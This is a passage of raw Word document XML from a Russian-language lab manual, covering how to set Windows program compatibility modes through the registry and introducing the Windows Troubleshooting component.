          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3585845" cy="842645"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="145" name="Рисунок 5" descr="Редактор реес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едактор реестра"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3585845" cy="842645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В любом свободном месте окна </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Layers</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> кликаем правой клавишей мышки и выбираем варианты </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создать</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Строковый параметр</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, а вместо имени параметра внесите путь к ПО (узнать его можно через </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Свойства</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ярлыка программы).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2188845" cy="1065530"/>
            <wp:effectExtent l="19050" t="0" r="1905" b="0"/>
            <wp:docPr id="144" name="Рисунок 6" descr="Создание строкового параме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оздание строкового параметра"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2188845" cy="1065530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаблон готов, теперь нужно ввести значение совместимости. Делается это просто: нажимаем правой кнопочкой мыши по параметру, который мы только что создали и кликаем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изменить</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. В блоке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Значения</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> нам нужно ввести одну из команд совместимости:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WIN95–Windows 95;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WIN98–Windows 95;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NT4SP5–Windows NT 4.0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WIN2000–Windows 2000;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WINXPSP2–Windows XP SP2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WINXPSP3–Windows XP SP3;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">VISTARTM (VISTASP1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> VISTASP2 – </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>зависимости</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>от</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>пакета</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>обновлений</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) – Vista;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WIN7RTM–Windows 7.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>После того, как все значения будут внесены и сохранены, закрывайте редактор реестра и запускайте нужную утилиту. Вот и все, ваша Виндовс 8 может работать с пакетом программ XР (к примеру).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В конечном итоге, вы всегда сможете найти нужное ПО, уже разработанное для новых линеек </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc507788527"/>
      <w:bookmarkStart w:id="27" w:name="_Toc507788252"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 3 Решение проблем несовместимости программного обеспечения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, используя </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>компонент</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Устранение неполадок</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Изучить методы </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>выявление проблем несовместимости программного обеспечения</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся скриншоты и описание этапов работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>От версии к версии Microsoft старается улучшить стабильность и надежность операционной системы Windows, правда иногда что-то начинает идти не так и возникают проблемы. Начиная с самых ранних версий ОС Windows NT, в них существовали инструменты поиска и устранения неисправностей, но они были запрятаны глубоко в недра системы и были довольно сложны в применении, практически недоступны начинающему пользователю.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Все изменилось в Windows 7. В этой операционной системе появился новый компонент для устранения проблем - этот компонент </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Устранение неполадок </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Windows Troubleshooting Platform), который является расширяемой инфраструктурой для автоматизированной диагностики проблем аппаратных средств и программного обеспечения и попытки автоматически устранять некоторые распространенные проблемы, такие как проблемы, возникающие при работе с сетью, аппаратным обеспечением и устройствами, связанные с использованием Интернета, а также проблемы совместимости программ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Компонент обзавелся графическим интерфейсом и теперь пользователю, выполняющему поиск неисправностей поможет Мастер, который попытается идентифицировать источник проблемы, предоставит инструкции для решения проблемы или решит ее автоматически. Несмотря на то, что компонент</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Устранения неполадок</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> не рассчитаны на решение всех возможных проблем, рекомендуется использовать его в качестве первого этапа работ по устранению неполадок, так как это может сэкономить время и избавить пользователя от лишних действий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Открыть компонент </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Устранение неполадок </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>можно из нескольких мест:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Панель управления - Устранение неполадок</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Панель управления - Восстановление - Устранение неполадок</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Центр поддержки - Устранение неполадок</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Кроме того, запустить компонент можно и из некоторых работающих приложений. Например, если IE не может открыть веб-сайт, щелкните кнопку</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диагностика проблем подключения</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Запустится мастер Диагностики сетей, который входит в пакет поиска неисправностей компонента Устранение неполадок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для знакомства запустим компонент </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Устранение неполадок</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> из </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Панели управления</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
